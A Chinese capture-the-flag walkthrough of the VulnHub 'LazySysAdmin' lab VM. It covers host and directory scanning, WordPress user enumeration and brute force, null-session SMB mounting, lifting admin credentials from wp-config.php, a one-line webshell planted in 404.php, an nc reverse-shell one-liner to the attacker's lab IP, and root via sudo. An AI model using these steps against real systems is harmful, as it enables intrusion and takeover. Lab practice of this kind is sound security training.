下载地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
攻击者IP:192.168.232.129 nat vmare
受害者IP:192.168.232.134 nat vmare
主机发现
arp-scan -l
nmap -p- -sV 192.168.232.134
web页面是一个静态的html,没有可以点的
目录扫描
dirsearch -u http://192.168.232.134
http://192.168.232.134/robots.txt
访问目录文件
http://192.168.232.134/info.php
192.168.232.134/phpmyadmin
没弱口令,没空密码
获得用户名togie
http://192.168.232.134/wordpress/wp-login.php
wpscan --url "http://192.168.232.134/wordpress/" -e u ,ap
获得两个用户名
admin
Admin
密码没爆出来
wpscan --url "http://192.168.232.134/wordpress/" -U use.txt -P /root/top1000.txt
从其他端口下手
enum4linux -A 192.168.232.134
发现可以使用空密码登录
挂载目录到本地
mount -t cifs -o username=’’,password=’’ //192.168.232.134/share$ /mnt
该命令用于挂载一个CIFS(Common Internet File System,通用互联网文件系统)类型的网络共享到本地文件系统中。让我们逐一查看命令的组成部分:mount: 这是一个用于挂载文件系统的Unix命令。-t cifs: 这个选项告诉 mount 命令需要挂载的文件系统的类型是 cifs,即一个Windows共享。-o username=’’,password=’’: 这是 -o (选项)的一部分,用于传递文件系统选项。username=’’ 和 password=’’ 表示尝试用一个空的用户名和密码登录SMB/CIFS服务器。//192.168.123.206/share$: 这是你想要挂载的远程共享的网络路径。192.168.123.206 是文件服务器的IP地址,share$ 是远程上分享的名字。$ 通常表示该共享是隐藏的,所以不会在网络浏览列表中出现。/mnt: 这是本地系统上的挂载点,即远程共享文件系统内的文件和目录将会“显示”的位置。
找到一个密码12345
wordpress发现wp-congig.php,获得账号密码
Admin/TogieMYSQL12345^^
使用这个账号登录wp找到文件上传漏洞
404.php插入一句话木马
蚁剑反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.232.129 1111 >/tmp/f
su togie
12345
sudo su
12345
原文始发于微信公众号(王之暴龙战神):Lazysysadmin
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论